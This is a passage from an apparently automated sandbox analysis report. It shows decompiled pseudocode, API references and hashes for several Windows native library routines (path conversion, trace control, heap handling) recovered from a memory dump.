Part of subcall function 6AB652A5: RtlEnterCriticalSection.1105(6AC579A0,?,00000000,?), ref: 6AB652BF
Part of subcall function 6AB652A5: RtlLeaveCriticalSection.1105(6AC579A0,6AC579A0,?,00000000,?), ref: 6AB652DD

memcpy.1105(?,?), ref: 6AB6525B
RtlLeaveCriticalSection.1105(6AC579A0), ref: 6ABC0D2B
RtlLeaveCriticalSection.1105(6AC579A0), ref: 6ABC0D71
ZwClose.1105(?), ref: 6ABC0D84
RtlFreeHeap.1105(?,00000000,00000000,?), ref: 6ABC0D95
RtlLeaveCriticalSection.1105(6AC579A0), ref: 6ABC0DA7
ZwClose.1105(?), ref: 6ABC0DB4
RtlFreeHeap.1105(?,00000000,00000000,?), ref: 6ABC0DC5

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$CloseFreeHeap$Entermemcpy
String ID:
API String ID: 3163955863-0
Opcode ID: 787e52c30b73a389781e93e8daa2e4abd1ac44239c5381dd5a4f8c6d18e90b54
Instruction ID: 99316a8be8fa7496df3ac377b26f8c8a6d00e71990c009bf3e358f33942bfeea
Opcode Fuzzy Hash: 787e52c30b73a389781e93e8daa2e4abd1ac44239c5381dd5a4f8c6d18e90b54
Instruction Fuzzy Hash: CF310871246A80EBC7229F18CC84F5A77B5FF01764F12471AE9260B1A2EF71E860F795

Uniqueness

Uniqueness Score: -1.00%

Function 6AB84120, Relevance: 13.9, APIs: 9, Instructions: 444
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E6AB84120(signed char __ecx, intOrPtr* __edx, signed short* _a4, signed short* _a8, intOrPtr _a12, long* _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v16;
				signed int _v24;
				char _v532;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				void* _v564;
				signed char _v568;
				void* _v570;
				long* _v572;
				long _v576;
				signed short* _v580;
				char _v581;
				signed short _v584;
				signed int _v588;
				unsigned int _v596;
				void* _v597;
				void* _v604;
				void* _v605;
				void* _v608;
				void* _v612;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				char _t163;
				void* _t169;
				void* _t173;
				signed short _t177;
				void* _t181;
				unsigned int _t182;
				struct _EXCEPTION_RECORD _t184;
				signed int _t185;
				signed int _t213;
				void* _t221;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				void* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				long* _t260;
				long _t265;
				signed short* _t269;
				signed short _t271;
				signed char _t272;
				signed short* _t275;
				short* _t282;
				signed short _t283;
				void* _t287;
				signed short _t290;
				short* _t300;
				signed short _t308;
				int _t309;
				int _t311;
				signed short _t312;
				intOrPtr* _t316;
				long _t317;
				void* _t318;
				void* _t320;
				signed short* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				signed int _t326;
				void* _t327;
				signed int _t328;
				signed int _t330;

				_t330 = (_t328 & 0xfffffff8) - 0x24c;
				_v8 =  *0x6ac5d360 ^ _t330;
				_t157 = _a8;
				_t322 = _a4;
				_t316 = __edx;
				_v548 = __ecx;
				_t306 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *((short*)(__edx)) <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t316;
						_v552 =  *((intOrPtr*)(_t316 + 4));
						_t161 = E6AB9F232( &_v556);
						_t317 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t307 = 0x208;
						_t317 = E6AB86E30(_t316, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t317 == 0) {
							L68:
							_t323 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t317 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 0, _t317);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_v596 = _t317;
											_t307 = _t317;
											_t317 = E6AB86E30(_v572, _t317, _t254, _v580, _t330 + 0x1b,  &_v548);
											if(_t317 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t317;
									 *((short*)(_t330 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t317 < 2) {
										L11:
										if(_t317 < 4 ||  *_t254 == 0 ||  *(_t254 + 2) != 0x3a) {
											_t161 = 5;
										} else {
											if(_t317 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 =  *(_t254 + 4) & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t317 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 =  *(_t254 + 2) & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t317 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 =  *(_t254 + 4) & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t317 < 8) {
																L85:
																_t161 = ((0 | _t317 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 =  *(_t254 + 6) & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M6AB845F8))) {
												case 0:
													_v568 = 0x6ab41078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x6ab411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t307 =  *_v568 & 0x0000ffff;
									_t265 = _t307 - _v564 + 2 + (_t317 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t323 = 0xc0000106;
									} else {
										if(_t322 != 0) {
											if(_t265 > (_t322[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t323 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t307;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t322) {
												_t323 = 0xc000000d;
											} else {
												L23:
												_t173 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 0, _t265);
												_t269 = _v588;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t323 = 0xc0000017;
												} else {
													_t317 = _v564;
													 *_t269 = 0;
													_t322 = _t269;
													_t269[1] = _v584;
													_t177 =  *_v576 & 0x0000ffff;
													L25:
													_v588 = _t177;
													if(_t177 == 0) {
														L29:
														_t308 =  *_t322 & 0x0000ffff;
													} else {
														_t290 =  *_t322 & 0x0000ffff;
														_v584 = _t290;
														_t311 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + _t311 > (_t322[1] & 0x0000ffff)) {
															_t308 =  *_t322 & 0xffff;
														} else {
															_t221 = _t322[2] + ((_v584 & 0x0000ffff) >> 1) * 2;
															_v584 = _t221;
															memmove(_t221,  *(_v576 + 4), _t311);
															_t330 = _t330 + 0xc;
															_t312 = _v588;
															_t225 =  *_t322 + _t312 & 0x0000ffff;
															 *_t322 = _t225;
															if(_t225 + 1 < (_t322[1] & 0x0000ffff)) {
																 *((short*)(_v584 + ((_t312 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v564 - _v596 + _v596;
													_v588 = _t308;
													_v584 = _t271;
													if(_t271 != 0) {
														_t309 = _t271 & 0x0000ffff;
														_v596 = _t309;
														if(_t309 + (_t308 & 0x0000ffff) <= (_t322[1] & 0x0000ffff)) {
															_t287 = _t322[2] + ((_v588 & 0x0000ffff) >> 1) * 2;
															_v588 = _t287;
															memmove(_t287, _v560 + _v572, _t309);
															_t330 = _t330 + 0xc;
															_t213 =  *_t322 + _v584 & 0x0000ffff;
															 *_t322 = _t213;
															if(_t213 + 1 < (_t322[1] & 0x0000ffff)) {
																 *((short*)(_v588 + (_v596 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v568;
													if(_t272 != 0) {
														 *_t272 = _t322;
													}
													_t307 = 0;
													 *((short*)(_t322[2] + (( *_t322 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v580;
													if(_t275 != 0) {
														_t307 =  *_t275;
														if(_t307 != 0) {
															 *_t275 = ( *_v576 & 0x0000ffff) - _v572 - _t254 + _t307 + _t322[2];
														}
													}
													_t181 = _v552;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v548 == 5) {
															_t182 = E6AB652A5(1);
															_v596 = _t182;
															if(_t182 == 0) {
																E6AB7EB70(1, 0x6ac579a0);
																goto L38;
															} else {
																_t184 = _t182 + 0xc;
																_v568 = _t184;
																_t185 = RtlPrefixUnicodeString(_t184,  &_v564, 1);
																if(_t185 == 0) {
																	_t325 = _v608;
																	goto L97;
																} else {
																	_t307 = _v564;
																	_t282 = ( *_v580 & 0x0000ffff) - _v584 + ( *_v588 & 0x0000ffff) + _t322[2];
																	 *((intOrPtr*)(_t307 + 4)) = _t282;
																	_v596 = _t282;
																	_t326 = _t317 -  *_v580 & 0x0000ffff;
																	 *_t307 = _t326;
																	if( *_t282 == 0x5c) {
																		_t149 = _t326 - 2; // -2
																		_t283 = _t149;
																		 *_t307 = _t283;
																		 *((intOrPtr*)(_t307 + 4)) = _v596 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t325 = _v608;
																	 *(_t307 + 2) = _t185;
																	if((_v568 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t325 + 4)));
																			E6ABA95D0();
																			RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t325);
																		}
																	} else {
																		 *(_t307 + 0xc) = _t325;
																		 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t325 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t323 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t254);
									}
									_t169 = _t323;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t318);
					_pop(_t324);
					_pop(_t255);
					return E6ABAB640(_t169, _t255, _v16 ^ _t330, _t307, _t318, _t324);
				} else {
					_t300 =  *((intOrPtr*)(__edx + 4));
					if( *_t300 == 0x5c) {
						_t256 =  *(_t300 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t300 + 4)) != 0x3f ||  *((short*)(_t300 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E6ABA3D43(_t316, _t322, _t157, _v560, _v572, _t306);
								_pop(_t320);
								_pop(_t327);
								_pop(_t257);
								return E6ABAB640(_t251, _t257, _v24 ^ _t330, _t322, _t320, _t327);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x6ab84128
0x6ab84135
0x6ab8413c
0x6ab84141
0x6ab84145
0x6ab84147
0x6ab8414e
0x6ab84151
0x6ab84159
0x6ab8415c
0x6ab84160
0x6ab84164
0x6ab84168
0x6ab8416c
0x6ab8417f
0x6ab84181
0x6ab8446a
0x6ab8446a
0x6ab8418c
0x6ab84195
0x6ab84199
0x6ab84432
0x6ab84439
0x6ab8443d
0x6ab84442
0x6ab84447
0x00000000
0x6ab8419f
0x6ab841a3
0x6ab841b9
0x6ab841bd
0x6ab845db
0x6ab845db
0x00000000
0x6ab841c3
0x6ab841c3
0x6ab841ce
0x6ab841d4
0x6abce138
0x6abce13e
0x6abce169
0x6abce16d
0x6abce19e
0x6abce16f
0x6abce175
0x6abce179
0x6abce18f
0x6abce193
0x00000000
0x6abce199
0x00000000
0x6abce199
0x6abce193
0x00000000
0x00000000
0x00000000
0x6ab841da
0x6ab841da
0x6ab841df
0x6ab841e4
0x6ab841ec
0x6ab84203
0x6ab84207
0x6abce1fd
0x6ab84222
0x6ab84226
0x6abce1f3
0x6abce1f3
0x6ab8422c
0x6ab8422c
0x6ab84233
0x6abce1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab84239
0x6ab84239
0x6ab84239
0x6ab84239
0x6ab84233
0x6ab84226
0x6ab841ee
0x6ab841ee
0x6ab841f4
0x6ab84575
0x6abce1b1
0x6abce1b1
0x00000000
0x6ab8457b
0x6ab8457b
0x6ab84582
0x6abce1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab84588
0x6ab84588
0x6ab8458c
0x6abce1c4
0x6abce1c4
0x00000000
0x6ab84592
0x6ab84592
0x6ab84599
0x6abce1be
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab8459f
0x6ab8459f
0x6ab845a3
0x6abce1d7
0x6abce1e4
0x00000000
0x6ab845a9
0x6ab845a9
0x6ab845b0
0x6abce1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab845b6
0x6ab845b6
0x6ab845b6
0x00000000
0x6ab845b6
0x6ab845b0
0x6ab845a3
0x6ab84599
0x6ab8458c
0x6ab84582
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab841f4
0x6ab8423e
0x6ab84241
0x6ab845c0
0x6ab845c4
0x00000000
0x6ab845ca
0x6ab845ca
0x00000000
0x6abce207
0x6abce20f
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab845d1
0x00000000
0x00000000
0x6ab845ca
0x00000000
0x6ab84247
0x6ab84247
0x6ab84247
0x6ab84249
0x6ab84249
0x6ab84249
0x6ab84251
0x6ab84251
0x6ab84257
0x6ab8425f
0x6ab8426e
0x6ab84270
0x6ab8427a
0x6abce219
0x6abce219
0x6ab84280
0x6ab84282
0x6ab84456
0x6ab845ea
0x00000000
0x6ab845f0
0x6abce223
0x00000000
0x6abce223
0x6ab8445c
0x6ab8445c
0x00000000
0x6ab8445c
0x00000000
0x6ab84288
0x6ab8428c
0x6abce298
0x6ab84292
0x6ab84292
0x6ab8429e
0x6ab842a3
0x6ab842a7
0x6ab842ac
0x6abce22d
0x6ab842b2
0x6ab842b2
0x6ab842b9
0x6ab842bc
0x6ab842c2
0x6ab842ca
0x6ab842cd
0x6ab842cd
0x6ab842d4
0x6ab8433f
0x6ab8433f
0x6ab842d6
0x6ab842d6
0x6ab842d9
0x6ab842dd
0x6ab842eb
0x6abce23a
0x6ab842f1
0x6ab842fe
0x6ab84305
0x6ab8430d
0x6ab84315
0x6ab84318
0x6ab8431f
0x6ab84322
0x6ab8432e
0x6ab8433b
0x6ab8433b
0x00000000
0x6ab8432e
0x6ab842eb
0x6ab8434c
0x6ab8434e
0x6ab84352
0x6ab84359
0x6ab8435e
0x6ab84361
0x6ab8436e
0x6ab8437d
0x6ab8438a
0x6ab8438e
0x6ab84396
0x6ab8439e
0x6ab843a1
0x6ab843ad
0x6ab843bb
0x6ab843bb
0x6ab843ad
0x6ab8436e
0x6ab843bf
0x6ab843c5
0x6ab84463
0x6ab84463
0x6ab843ce
0x6ab843d5
0x6ab843d9
0x6ab843df
0x6ab84475
0x6ab84479
0x6ab84491
0x6ab84491
0x6ab84479
0x6ab843e5
0x6ab843eb
0x6ab843f4
0x6ab843f6
0x6ab843f9
0x6ab843fc
0x6ab843ff
0x6ab844e8
0x6ab844ed
0x6ab844f3
0x6abce247
0x00000000
0x6ab844f9
0x6ab844ff
0x6ab84504
0x6ab84508
0x6ab8450f
0x6abce269
0x00000000
0x6ab84515
0x6ab84519
0x6ab84531
0x6ab84534
0x6ab84537
0x6ab8453e
0x6ab84541
0x6ab8454a
0x6abce255
0x6abce255
0x6abce25b
0x6abce25e
0x6abce261
0x6abce261
0x6ab84555
0x6ab84559
0x6ab8455d
0x6abce26d
0x6abce270
0x6abce274
0x6abce27a
0x6abce27d
0x6abce28e
0x6abce28e
0x6ab84563
0x6ab84563
0x6ab84569
0x6ab84569
0x00000000
0x6ab8455d
0x6ab8450f
0x00000000
0x6ab844f3
0x6ab843ff
0x6ab84405
0x6ab84405
0x6ab84405
0x6ab842ac
0x6ab8428c
0x6ab84282
0x6ab84407
0x6ab8440d
0x6abce2af
0x6abce2af
0x6ab84413
0x6ab84413
0x00000000
0x6ab841d4
0x00000000
0x6ab841c3
0x6ab841bd
0x6ab84415
0x6ab84415
0x6ab84416
0x6ab84417
0x6ab84429
0x6ab8416e
0x6ab8416e
0x6ab84175
0x6ab84498
0x6ab8449f
0x6abce12d
0x00000000
0x6abce133
0x00000000
0x6abce133
0x6ab844a5
0x6ab844a5
0x6ab844aa
0x00000000
0x6ab844bb
0x6ab844ca
0x6ab844d6
0x6ab844d7
0x6ab844d8
0x6ab844e3
0x6ab844e3
0x6ab844aa
0x6ab8417b
0x6ab8417b
0x6ab8417b
0x00000000
0x6ab8417b
0x6ab84175
0x00000000

APIs

RtlAllocateHeap.1105(?,00000000,?,?,00000000,?,?), ref: 6AB8429E
memmove.1105(?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 6AB8430D
memmove.1105(?,?,?,?,00000000,?,?,00000000,?,?), ref: 6AB8438E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: memmove$AllocateHeap
String ID:
API String ID: 1771830547-0
Opcode ID: 793ee64791a5ca37a633ddfbbf76ee0501ecf14e23af56b94a3ce8c9b5af1201
Instruction ID: ccd4d232210f93d844c13a4f03e46a98b8225e25c5db2a5dd126c64ac40ffeaa
Opcode Fuzzy Hash: 793ee64791a5ca37a633ddfbbf76ee0501ecf14e23af56b94a3ce8c9b5af1201
Instruction Fuzzy Hash: CBF19AB0608291DBC754CF19C480A2EB7F5FF89714F15492EF896CB291EB38D891EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6AB94BAD, Relevance: 13.6, APIs: 9, Instructions: 131
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6AB94BAD(long __ecx, void* __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				char _v36;
				void _v156;
				short _v158;
				intOrPtr _v160;
				long _v164;
				long _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				void* _t84;
				void* _t85;
				long _t86;
				int _t87;
				long _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x6ac5d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E6AB6CC50(_t86);
					L11:
					return E6ABAB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0 || _t45 !=  *((intOrPtr*)(_t77 + 0x34))) {
					goto L22;
				} else {
					_t9 = _t77 + 0x24; // 0x6ac58504
					E6AB82280(_t9, _t9);
					_t87 = 0x78;
					 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
					memset( &_v156, 0, _t87);
					_t85 =  &_v156;
					_v36 =  *((intOrPtr*)(_t77 + 0x30));
					_v28 = _v168;
					_v32 = 0;
					_v24 = 0;
					_v20 = _v158;
					_v160 = 0;
					while(1) {
						_push( &_v164);
						_push(_t87);
						_push(_t85);
						_push(0x18);
						_push( &_v36);
						_push(0x1e);
						_t88 = E6ABAB0B0();
						if(_t88 != 0xc0000023) {
							break;
						}
						if(_t85 !=  &_v156) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t85);
						}
						_t84 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _v164);
						_v168 = _v164;
						if(_t84 == 0) {
							_t88 = 0xc0000017;
							goto L19;
						} else {
							_t74 = _v160 + 1;
							_v160 = _t74;
							if(_t74 >= 0x10) {
								L19:
								_t86 = RtlNtStatusToDosError(_t88);
								if(_t86 != 0) {
									L8:
									 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
									_t30 = _t77 + 0x24; // 0x6ac58504
									E6AB7FFB0(_t77, _t84, _t30);
									if(_t84 != 0 && _t84 !=  &_v156) {
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t84);
									}
									if(_t86 != 0) {
										goto L12;
									} else {
										goto L11;
									}
								}
								L6:
								 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
								if(_v164 != 0) {
									_t83 = _t84;
									E6AB94F49(_t77, _t84);
								}
								goto L8;
							}
							_t87 = _v168;
							continue;
						}
					}
					if(_t88 != 0) {
						goto L19;
					}
					goto L6;
				}
			}

0x6ab94bad
0x6ab94bbf
0x6ab94bc2
0x6ab94bc6
0x6ab94bcd
0x6ab94bd9
0x6abd67fe
0x6abd6800
0x6ab94ccc
0x6ab94ccd
0x6ab94cb7
0x6ab94cc9
0x6ab94cc9
0x6ab94bdf
0x6ab94be5
0x00000000
0x6ab94bf5
0x6ab94bf5
0x6ab94bf9
0x6ab94c06
0x6ab94c0b
0x6ab94c17
0x6ab94c1f
0x6ab94c25
0x6ab94c33
0x6ab94c3d
0x6ab94c40
0x6ab94c43
0x6ab94c47
0x6ab94c4d
0x6ab94c53
0x6ab94c54
0x6ab94c55
0x6ab94c56
0x6ab94c5b
0x6ab94c5c
0x6ab94c63
0x6ab94c6b
0x00000000
0x00000000
0x6abd6776
0x6abd6784
0x6abd6784
0x6abd679f
0x6abd67a7
0x6abd67af
0x6abd67ce
0x00000000
0x6abd67b1
0x6abd67b7
0x6abd67b8
0x6abd67c1
0x6abd67d3
0x6abd67d9
0x6abd67dd
0x6ab94c94
0x6ab94c94
0x6ab94c98
0x6ab94c9c
0x6ab94ca3
0x6abd67f4
0x6abd67f4
0x6ab94cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab94cb5
0x6ab94c79
0x6ab94c7e
0x6ab94c89
0x6ab94c8b
0x6ab94c8f
0x6ab94c8f
0x00000000
0x6ab94c89
0x6abd67c3
0x00000000
0x6abd67c3
0x6abd67af
0x6ab94c73
0x00000000
0x00000000
0x00000000
0x6ab94c73

APIs

RtlAcquireSRWLockExclusive.1105(6AC58504,6AC55338,00000000,6AC55320), ref: 6AB94BF9
memset.1105(?,00000000,00000078,6AC58504,6AC55338,00000000,6AC55320), ref: 6AB94C17
ZwTraceControl.1105(0000001E,00000000,00000018,?,00000078,?,6AC55338,00000000,6AC55320), ref: 6AB94C5E
RtlReleaseSRWLockExclusive.1105(6AC58504,C0000017,?,00000008,?,0000001E,00000000,00000018,?,00000078,?,6AC55338,00000000,6AC55320), ref: 6AB94C9C
RtlSetLastWin32Error.1105(00000000,6AC58504,C0000017,?,00000008,?,0000001E,00000000,00000018,?,00000078,?,6AC55338,00000000,6AC55320), ref: 6AB94CCD
RtlFreeHeap.1105(?,00000000,?,0000001E,00000000,00000018,?,00000078,?,6AC55338,00000000,6AC55320), ref: 6ABD6784
RtlAllocateHeap.1105(?,00000008,?,0000001E,00000000,00000018,?,00000078,?,6AC55338,00000000,6AC55320), ref: 6ABD679A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveHeapLock$AcquireAllocateControlErrorFreeLastReleaseTraceWin32memset
String ID:
API String ID: 375855687-0
Opcode ID: 7add8a52bf73862b30648281ec4858ca107e48f8e9b6ec0014213fd5b331c524
Instruction ID: 485689b91af0161134c79a0b86a31dab57da2413b3639acac64a07d1a88ff513
Opcode Fuzzy Hash: 7add8a52bf73862b30648281ec4858ca107e48f8e9b6ec0014213fd5b331c524
Instruction Fuzzy Hash: C241D035A412ACAFCB20DF68C944BDE77B5EF46700F0200A5E918AB252DF74DE80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB94D3B, Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6AB94D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				void _v176;
				char _v177;
				long _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t42;
				void* _t44;
				long _t46;
				intOrPtr _t50;
				long _t56;
				void* _t57;
				int _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x6ac5d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				memset( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x6ac57bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E6ABAB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t57);
						}
						_v177 = 1;
						_t44 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = RtlNtStatusToDosError(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E6ABAB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E6ABAF380(_t67 + 0xc, 0x6ab45138, 0x10) == 0) {
								 *0x6ac560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E6AB94F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				_t56 = E6AB94E70(0x6ac586b0, 0x6ab95690, 0, 0);
				if(_t56 != 0) {
					_t46 = RtlNtStatusToDosError(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x6ab94d3b
0x6ab94d4d
0x6ab94d53
0x6ab94d58
0x6ab94d65
0x6ab94d6c
0x6ab94d71
0x6ab94d77
0x6ab94d7f
0x6ab94d8c
0x6ab94d8e
0x6ab94dad
0x6ab94db0
0x6ab94db7
0x6ab94db8
0x6ab94db9
0x6ab94dba
0x6ab94dbb
0x6ab94dc1
0x6ab94dc8
0x6ab94dcc
0x6ab94dd5
0x6ab94dde
0x6ab94ddf
0x6ab94de0
0x6ab94de1
0x6ab94de6
0x6ab94de7
0x6ab94de9
0x6ab94df3
0x00000000
